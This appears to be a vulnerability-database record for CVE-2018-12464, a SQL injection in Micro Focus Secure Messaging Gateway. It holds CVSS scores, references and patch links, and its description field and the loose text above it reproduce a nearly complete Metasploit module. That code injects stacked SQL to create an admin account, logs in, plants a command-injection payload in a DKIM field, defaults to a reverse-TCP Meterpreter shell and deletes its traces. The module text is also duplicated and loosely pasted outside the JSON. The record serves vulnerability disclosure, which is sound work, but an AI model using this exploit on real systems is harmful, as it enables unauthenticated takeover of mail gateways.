              "lang": "en",
              "value": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5)."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-89"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://support.microfocus.com/kb/doc.php?id=7023132",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
            },
            {
              "name": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/",
              "refsource": "CONFIRM",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
            },
            {
              "name": "45083",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://www.exploit-db.com/exploits/45083/"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2019-10-09T23:33Z",
      "publishedDate": "2018-06-29T16:29Z"
    }
  }
}

A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5). Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components; quarantine is one of the file isolation components. An unauthenticated user can execute a terminal command under the context of the web user.

    One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,
    which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. 
    manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible
    to access this endpoint without having a valid session.

    Combining these vulnerabilities gives the opportunity execute operation system commands under the context
    of the web user. 
  },
  'License'        => MSF_LICENSE,
  'Author'         =>
    [
      'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
    ],
  'References'     =>
    [
      ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'],
      ['CVE', '2018-12464'],
      ['CVE', '2018-12465'],
      ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'],
      ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133']
    ],
  'DefaultOptions'  =>
    {
      'Payload' => 'php/meterpreter/reverse_tcp',
      'Encoder' => 'php/base64'
    },
  'Platform'       => ['php'],
  'Arch'           => ARCH_PHP,
  'Targets'        => [[ 'Automatic', { }]],
  'Privileged'     => false,
  'DisclosureDate' => "Jun 19 2018",
  'DefaultTarget'  => 0
))

register_options(
  [
    OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
  ]
)

end

def execute_query(query) # # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques # but since we are able to use stacked-query approach, following form of payload is required in order to be able # get back the output of query ! # sql = rand_text_alphanumeric(3 + rand(3)) sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; " sql << query sql << "; -- " sql << rand_text_alphanumeric(3 + rand(3))

send_request_cgi(
  'method'  => 'POST',
  'uri'     =>  normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
  'vars_post' => {
    'appkey' => sql
  }
)

end

def something_went_wrong fail_with Failure::Unknown, 'Something went wrong' end

def check r = rand_text_numeric(15..35) res = execute_query("SELECT #{r}") unless res vprint_error 'Connection failed' return CheckCode::Unknown end unless res.code == 200 && res.body.include?(r) return CheckCode::Safe end CheckCode::Vulnerable end

def implant_payload(cookie) print_status('Creating a domain record with a malformed DKIM data') p = [ { :id => 'temp_0', :Description => rand_text_alpha(5), :DkimList => [ { :Domain => "$(php -r '#{payload.encoded}')", :Selector => '', :TempId => 'tempDkim_1' } ] } ].to_json res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'), 'cookie' => cookie, 'vars_get' => { 'cache' => 0, }, 'vars_post' => { 'StateData' => '[{"ouid":1}]', 'SaveData' => p } })

if res && res.code == 200 && res.body.include?('DbNodeId')
  # Defining as global variable since we need to access them later within clean up function. 
  begin
    @domainid  = res.get_json_document['Nodes'][0]['DbNodeId']
    @dkimid  = res.get_json_document['Nodes'][1]['DbNodeId']
  rescue => e
    fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
  end
  print_good('Payload is successfully implanted')
else
  something_went_wrong
end

end

def create_user # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection # issue location where requires a valid session ! print_status('Creating a user with appropriate privileges')

# Defining as global variable since we need to access them later within clean up function. 
@username = rand_text_alpha_lower(5..25)
@userid = rand_text_numeric(6..8)
query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"

execute_query(query)
res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'")

if res && res.code == 200 && res.body.include?(@username)
  print_good("User successfully created. Username : #{@username}")
else
  something_went_wrong
end

end

def login print_status("Authenticating with created user") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'), 'vars_post' => { 'username' => @username, 'password' => rand_text_alpha_lower(5..25), 'passwordmandatory' => rand_text_alpha_lower(5..25), 'LimitInterfaceId' => 1 } ) if res && res.code == 200 && res.body.include?('/ui/default/index.php') print_good('Successfully authenticated') cookie = res.get_cookies else something_went_wrong end cookie end

def exploit unless check == CheckCode::Vulnerable fail_with Failure::NotVulnerable, 'Target is not vulnerable' end

create_user
cookie = login
implant_payload(cookie)

print_status('Triggering an implanted payload')
send_request_cgi({
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),
  'cookie' => cookie,
  'vars_get' => {
    'cache' => 0,
  },
  'vars_post' => {
    'DkimRecordId' => @dkimid
  }
})

end

def on_new_session(session) print_status('Cleaning up...') cmd = "" cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "' cmd << "DELETE FROM account WHERE loginname ='#{@username}';" cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};" cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};" cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};" cmd << '"' session.shell_command_token(cmd) end

end

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201806-1215",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "secure messaging gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "microfocus",
        "version": "471"
      },
      {
        "model": "micro focus secure messaging gateway",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "microfocus",
        "version": "471"
      },
      {
        "model": "focus secure messaging gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "micro",
        "version": "471"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:microfocus:secure_messaging_gateway",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "MEHMET INCE",
    "sources": [
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2018-12464",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2018-12464",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-122426",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2018-12464",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "security@opentext.com",
            "availabilityImpact": "HIGH",
            "baseScore": 10.0,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2018-12464",
            "impactScore": 6.0,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2018-12464",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "security@opentext.com",
            "id": "CVE-2018-12464",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2018-12464",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201807-018",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-122426",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5). \nExploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components; quarantine is one of the file isolation components. \n        An unauthenticated user can execute a terminal command under the context of the web user. \n\n        One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,\n        which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. \n        manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It\u0027s not possible\n        to access this endpoint without having a valid session. \n\n        Combining these vulnerabilities gives the opportunity execute operation system commands under the context\n        of the web user. \n      },\n      \u0027License\u0027        =\u003e MSF_LICENSE,\n      \u0027Author\u0027         =\u003e\n        [\n          \u0027Mehmet Ince \u003cmehmet@mehmetince.net\u003e\u0027 # author \u0026 msf module\n        ],\n      \u0027References\u0027     =\u003e\n        [\n          [\u0027URL\u0027, \u0027https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],\n          [\u0027CVE\u0027, \u00272018-12464\u0027],\n          [\u0027CVE\u0027, \u00272018-12465\u0027],\n          [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023132\u0027],\n          [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023133\u0027]\n        ],\n      \u0027DefaultOptions\u0027  =\u003e\n        {\n          \u0027Payload\u0027 =\u003e \u0027php/meterpreter/reverse_tcp\u0027,\n          \u0027Encoder\u0027 =\u003e \u0027php/base64\u0027\n        },\n      \u0027Platform\u0027       =\u003e [\u0027php\u0027],\n      \u0027Arch\u0027           =\u003e ARCH_PHP,\n      \u0027Targets\u0027        =\u003e [[ \u0027Automatic\u0027, { }]],\n      \u0027Privileged\u0027     =\u003e false,\n      \u0027DisclosureDate\u0027 =\u003e \"Jun 19 2018\",\n      \u0027DefaultTarget\u0027  =\u003e 0\n    ))\n\n    register_options(\n      [\n        OptString.new(\u0027TARGETURI\u0027, [true, \u0027The URI of the vulnerable instance\u0027, \u0027/\u0027])\n      ]\n    )\n  end\n\n  def execute_query(query)\n    #\n    # We have a very rare SQLi case in here. Normally, it\u0027s would be very easy to exploit it by using time-based techniques\n    # but since we are able to use stacked-query approach, following form of payload is required in order to be able\n    # get back the output of query !\n    #\n    sql = rand_text_alphanumeric(3 + rand(3))\n    sql \u003c\u003c \"\u0027) LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine \"\n    sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine \"\n    sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; \"\n    sql \u003c\u003c query\n    sql \u003c\u003c \"; -- \"\n    sql \u003c\u003c rand_text_alphanumeric(3 + rand(3))\n\n    send_request_cgi(\n      \u0027method\u0027  =\u003e \u0027POST\u0027,\n      \u0027uri\u0027     =\u003e  normalize_uri(target_uri.path, \u0027api\u0027, \u00271\u0027, \u0027enginelist.php\u0027),\n      \u0027vars_post\u0027 =\u003e {\n        \u0027appkey\u0027 =\u003e sql\n      }\n    )\n\n  end\n\n  def something_went_wrong\n    fail_with Failure::Unknown, \u0027Something went wrong\u0027\n  end\n\n  def check\n    r = rand_text_numeric(15..35)\n    res = execute_query(\"SELECT #{r}\")\n    unless res\n      vprint_error \u0027Connection failed\u0027\n      return CheckCode::Unknown\n    end\n    unless res.code == 200 \u0026\u0026 res.body.include?(r)\n      return CheckCode::Safe\n    end\n    CheckCode::Vulnerable\n  end\n\n  def implant_payload(cookie)\n    print_status(\u0027Creating a domain record with a malformed DKIM data\u0027)\n    p = [\n      {\n        :id =\u003e \u0027temp_0\u0027,\n        :Description =\u003e rand_text_alpha(5),\n        :DkimList =\u003e [\n          {\n            :Domain =\u003e \"$(php -r \u0027#{payload.encoded}\u0027)\",\n            :Selector =\u003e \u0027\u0027,\n            :TempId =\u003e \u0027tempDkim_1\u0027\n          }\n        ]\n      }\n    ].to_json\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_save_data.json.php\u0027),\n      \u0027cookie\u0027 =\u003e cookie,\n      \u0027vars_get\u0027 =\u003e {\n        \u0027cache\u0027 =\u003e 0,\n      },\n      \u0027vars_post\u0027 =\u003e {\n        \u0027StateData\u0027 =\u003e \u0027[{\"ouid\":1}]\u0027,\n        \u0027SaveData\u0027 =\u003e p\n      }\n    })\n\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027DbNodeId\u0027)\n      # Defining as global variable since we need to access them later within clean up function. \n      begin\n        @domainid  = res.get_json_document[\u0027Nodes\u0027][0][\u0027DbNodeId\u0027]\n        @dkimid  = res.get_json_document[\u0027Nodes\u0027][1][\u0027DbNodeId\u0027]\n      rescue =\u003e e\n        fail_with Failure::UnexpectedReply, \"Something went horribly wrong while implanting the payload : #{e.message}\"\n      end\n      print_good(\u0027Payload is successfully implanted\u0027)\n    else\n      something_went_wrong\n    end\n  end\n\n  def create_user\n    # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection\n    # issue location where requires a valid session !\n    print_status(\u0027Creating a user with appropriate privileges\u0027)\n\n    # Defining as global variable since we need to access them later within clean up function. \n    @username = rand_text_alpha_lower(5..25)\n    @userid = rand_text_numeric(6..8)\n    query = \"INSERT INTO account VALUES (#{@userid}, 1, \u0027#{@username}\u0027, \u00270\u0027, \u0027\u0027, 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)\"\n\n    execute_query(query)\n    res = execute_query(\"SELECT * FROM account WHERE loginname = \u0027#{@username}\u0027\")\n\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(@username)\n      print_good(\"User successfully created. Username : #{@username}\")\n    else\n      something_went_wrong\n    end\n  end\n\n  def login\n    print_status(\"Authenticating with created user\")\n    res = send_request_cgi(\n      \u0027method\u0027  =\u003e \u0027POST\u0027,\n      \u0027uri\u0027     =\u003e  normalize_uri(target_uri.path, \u0027security\u0027, \u0027securitygate.php\u0027),\n      \u0027vars_post\u0027 =\u003e {\n        \u0027username\u0027 =\u003e @username,\n        \u0027password\u0027 =\u003e rand_text_alpha_lower(5..25),\n        \u0027passwordmandatory\u0027 =\u003e rand_text_alpha_lower(5..25),\n        \u0027LimitInterfaceId\u0027 =\u003e 1\n      }\n    )\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027/ui/default/index.php\u0027)\n      print_good(\u0027Successfully authenticated\u0027)\n      cookie = res.get_cookies\n    else\n      something_went_wrong\n    end\n    cookie\n  end\n\n  def exploit\n    unless check == CheckCode::Vulnerable\n      fail_with Failure::NotVulnerable, \u0027Target is not vulnerable\u0027\n    end\n\n    create_user\n    cookie = login\n    implant_payload(cookie)\n\n    print_status(\u0027Triggering an implanted payload\u0027)\n    send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_dkim_keygen_request.php\u0027),\n      \u0027cookie\u0027 =\u003e cookie,\n      \u0027vars_get\u0027 =\u003e {\n        \u0027cache\u0027 =\u003e 0,\n      },\n      \u0027vars_post\u0027 =\u003e {\n        \u0027DkimRecordId\u0027 =\u003e @dkimid\n      }\n    })\n\n  end\n\n  def on_new_session(session)\n    print_status(\u0027Cleaning up...\u0027)\n    cmd = \"\"\n    cmd \u003c\u003c \u0027PGPASSWORD=postgres psql -U postgres -d SecureGateway -c \"\u0027\n    cmd \u003c\u003c \"DELETE FROM account WHERE loginname =\u0027#{@username}\u0027;\"\n    cmd \u003c\u003c \"DELETE FROM UserRole WHERE idaccount = #{@userid};\"\n    cmd \u003c\u003c \"DELETE FROM Domain WHERE iddomain = #{@domainid};\"\n    cmd \u003c\u003c \"DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};\"\n    cmd \u003c\u003c \u0027\"\u0027\n    session.shell_command_token(cmd)\n  end\n\nend\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      }
    ],
    "trust": 2.07
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-122426",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-12464",
        "trust": 2.9
      },
      {
        "db": "EXPLOIT-DB",
        "id": "45083",
        "trust": 2.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "106343",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "148758",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-122426",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "id": "VAR-201806-1215",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      }
    ],
    "trust": 0.85
  },
  "last_update_date": "2024-11-23T22:34:15.375000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Critical SQL Injection Vulnerability in SMG (CVE-2018-12464)",
        "trust": 0.8,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
      },
      {
        "title": "Micro Focus Secure Messaging Gateway Web administration  and quarantine Component SQL Repair measures for injecting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=81644"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
      },
      {
        "trust": 2.0,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
      },
      {
        "trust": 1.7,
